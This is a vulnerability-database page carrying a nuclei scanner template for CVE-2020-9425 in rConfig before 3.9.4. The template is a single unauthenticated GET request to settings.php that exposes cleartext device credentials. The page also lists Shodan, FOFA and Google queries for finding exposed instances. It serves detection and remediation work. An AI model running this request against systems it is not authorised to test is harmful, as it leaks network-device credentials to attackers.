Lucene search
K

rConfig <3.9.4 - Sensitive Information Disclosure

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 37 Views

rConfig <3.9.4 - Sensitive Information Disclosure, unauthenticated attacker can retrieve cleartext credentials via GET request to settings.ph

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
Unspecified vulnerability in rConfig (CNVD-2020-22276)
23 Mar 202000:00
cnvd
CVE
CVE-2020-9425
20 Mar 202017:42
cve
Cvelist
CVE-2020-9425
20 Mar 202017:42
cvelist
NVD
CVE-2020-9425
20 Mar 202018:15
nvd
OpenVAS
rConfig < 3.9.4 Information Disclosure Vulnerability
23 Mar 202000:00
openvas
OSV
CVE-2020-9425
20 Mar 202018:15
osv
Prion
Design/Logic Flaw
20 Mar 202018:15
prion
id: CVE-2020-9425

info:
  name: rConfig <3.9.4 - Sensitive Information Disclosure
  author: madrobot
  severity: high
  description: rConfig prior to version 3.9.4 is susceptible to sensitive information disclosure. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executes, resulting in the disclosure of cleartext credentials in the response.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information, such as usernames and passwords.
  remediation: |
    Upgrade rConfig to version 3.9.4 or later to fix the vulnerability.
  reference:
    - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153
    - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9425
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-9425
    cwe-id: CWE-670
    epss-score: 0.16671
    epss-percentile: 0.9664
    cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rconfig
    product: rconfig
    shodan-query: http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve,cve2020,rconfig.exposure,rconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/settings.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "defaultNodeUsername"
          - "defaultNodePassword"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c01146a39c47a6dec9822c60136ded303617b83e010014fb946cba35ffd80180022100be488225312d71aa63dc02dfbde82f068a3d5fa4204376ed6abfe22bf5a3bbce:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.16671
37